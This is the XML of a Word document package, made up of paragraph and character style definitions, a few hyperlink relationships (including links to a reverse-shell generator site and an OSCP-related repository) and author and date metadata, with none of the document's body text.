    <w:name w:val="WW_CharLFO7LVL3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4">
    <w:name w:val="WW_CharLFO7LVL4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5">
    <w:name w:val="WW_CharLFO7LVL5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6">
    <w:name w:val="WW_CharLFO7LVL6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7">
    <w:name w:val="WW_CharLFO7LVL7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:eastAsia="Symbol" w:hAnsi="Symbol" w:cs="Symbol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8">
    <w:name w:val="WW_CharLFO7LVL8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7LVL9">
    <w:name w:val="WW_CharLFO7LVL9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs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kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="20"/>
      <w:vertAlign w:val="baseline"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL1">
    <w:name w:val="WW_CharLFO8LVL1"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL2">
    <w:name w:val="WW_CharLFO8LVL2"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL3">
    <w:name w:val="WW_CharLFO8LVL3"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL4">
    <w:name w:val="WW_CharLFO8LVL4"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL5">
    <w:name w:val="WW_CharLFO8LVL5"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL6">
    <w:name w:val="WW_CharLFO8LVL6"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL7">
    <w:name w:val="WW_CharLFO8LVL7"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL8">
    <w:name w:val="WW_CharLFO8LVL8"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="WWCharLFO8LVL9">
    <w:name w:val="WW_CharLFO8LVL9"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
    <w:name w:val="Heading"/>
    <w:next w:val="BodyA"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:before="480" w:after="240" w:line="360" w:lineRule="auto"/>
      <w:textAlignment w:val="baseline"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F253F"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="DejaVu Serif" w:eastAsia="DejaVu Serif" w:hAnsi="DejaVu Serif" w:cs="DejaVu Serif"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US"/>
    </w:r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Normal1">
    <w:name w:val="Normal1"/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:overflowPunct w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000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pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs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Footer">
    <w:name w:val="footer"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs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Title">
    <w:name w:val="Title"/>
    <w:next w:val="BodyA"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:contextualSpacing/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:color w:val="17365D"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="2"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Heading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BodyA">
    <w:name w:val="Body A"/>
    <w:qFormat/>
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto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IndexHeading">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="Heading"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:next w:val="BodyA"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:before="480" w:after="240" w:line="360" w:lineRule="auto"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria" w:cs="Cambria"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0F253F"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9340"/>
      </w:tabs>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="100" w:line="288" w:lineRule="auto"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
      <w:color w:val="000000"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9560"/>
      </w:tabs>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="100" w:line="288" w:lineRule="auto"/>
      <w:ind w:left="220"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Body">
    <w:name w:val="Body"/>
    <w:qFormat/>
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:qFormat/>
    <w:pPr>
      <w:overflowPunct w:val="0"/>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:textAlignment w:val="baseline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pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22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OC11">
    <w:name w:val="TOC 11"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC21">
    <w:name w:val="TOC 21"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TOC31">
    <w:name w:val="TOC 31"/>
    <w:basedOn w:val="Normal1"/>
    <w:next w:val="Normal1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="400"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Index"/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="NoList1">
    <w:name w:val="No List_1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="ImportedStyle1">
    <w:name w:val="Imported Style 1"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="ImportedStyle2">
    <w:name w:val="Imported Style 2"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003653E0"/>
    <w:pPr>
      <w:overflowPunct/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:textAlignment w:val="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:lang w:val="en-IL" w:eastAsia="en-IL"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B400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773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806EA"/>
    <w:rPr>
      <w:color w:val="551A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revshells.com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J4c0b-1337x007/oscpSAscan" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:admin@htb.local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1876</TotalTime>
  <Pages>8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Yehonatan Sion</dc:creator>
  <cp:lastModifiedBy>Yehonatan Sion</cp:lastModifiedBy>
  <cp:revision>435</cp:revision>
  <cp:lastPrinted>2025-08-06T09:32:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-29T13:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-08T22:49:00Z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2023-11-24T20:00:00Z</dcterms:created>
  <dc:creator>irtza ch</dc:creator>
  <dc:description/>
  <dc:language>en-CA</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-21T09:50:50Z</dcterms:modified>
  <cp:revision>15</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>